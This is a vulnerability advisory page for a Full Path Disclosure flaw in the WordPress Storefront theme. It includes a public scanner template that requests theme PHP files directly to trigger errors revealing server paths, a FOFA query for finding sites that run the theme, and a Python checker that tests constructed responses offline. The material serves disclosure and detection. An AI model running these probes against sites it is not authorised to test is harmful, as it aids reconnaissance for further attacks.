wordpress-storefront-fpd: WordPress Storefront Theme - Full Path Disclosure

Date: 2026-01-08 | Affected software: WordPress Storefront Theme | PoC: public

Vulnerability description

The Storefront theme for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.

PoC code [public]

id: wordpress-storefront-fpd

info:
  name: WordPress Storefront Theme - Full Path Disclosure
  author: pussycat0x
  severity: low
  description: |
    The Storefront theme for WordPress was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
  reference:
    - https://wordpress.org/themes/storefront/
    - https://woocommerce.com/products/storefront/
  metadata:
    max-request: 3
    vendor: wordpress
    product: storefront
    fofa-query: body="/wp-content/themes/storefront/"
  tags: wordpress,wp,wp-theme,fpd,disclosure,storefront,woocommerce

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/themes/storefront/functions.php"
      - "{{BaseURL}}/wp-content/themes/storefront/header.php"
      - "{{BaseURL}}/wp-content/themes/storefront/footer.php"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:", "failed to open stream")'
          - 'status_code == 200 || status_code == 500'
          - 'contains(body, "/storefront")'
        condition: and
# digest: 4a0a004730450220075c803ce60c45c3daba428577533b103b851dfaa85dda71ab204040233f798d022100bcf7906010fb0780ff2ed5422aa5421d7c793a924391d4c521c75f97f59e6908:922c64590222798bb761d5b6d8e72950
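
The template's matcher conditions, mirrored offline so responses captured from your own site can be checked and the exposed path read out. This is an added example, not part of the original template; the sample responses, `example_fn` and the path regex are constructed assumptions.

```python
import re

# Absolute filesystem path (Unix or Windows style) that runs through the theme directory.
PATH_RE = re.compile(r'(?:[A-Za-z]:\\|/)[^\s<>"\']*[\\/]storefront[\\/][^\s<>"\':]+\.php')


def contains_all(body, *needles):
    """Case-sensitive substring test, like the DSL helper of the same name."""
    return all(n in body for n in needles)


def matches_template(status_code, body):
    """The template's three DSL expressions, joined with AND."""
    error_text = (contains_all(body, "Fatal error", "Uncaught Error:")
                  or contains_all(body, "Warning:", "failed to open stream"))
    return error_text and status_code in (200, 500) and "/storefront" in body


def disclosed_paths(body):
    """Server-side paths that the error text exposes, de-duplicated."""
    return sorted(set(PATH_RE.findall(body)))


# Constructed responses (not captured from a real site).
LEAKING = (500, "Fatal error: Uncaught Error: Call to undefined function example_fn() "
                "in /var/www/html/wp-content/themes/storefront/header.php:12\n"
                "Stack trace:\n#0 {main}\n"
                "  thrown in /var/www/html/wp-content/themes/storefront/header.php on line 12")
ERRORS_HIDDEN = (500, "")  # same failure, error text not sent to the client
NORMAL_PAGE = (200, '<link href="/wp-content/themes/storefront/style.css">'
                    "<p>Warning: only 2 left in stock</p>")

if __name__ == "__main__":
    for name, (status, body) in [("leaking", LEAKING), ("errors hidden", ERRORS_HIDDEN),
                                 ("normal page", NORMAL_PAGE)]:
        print(name, matches_template(status, body), disclosed_paths(body))
```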
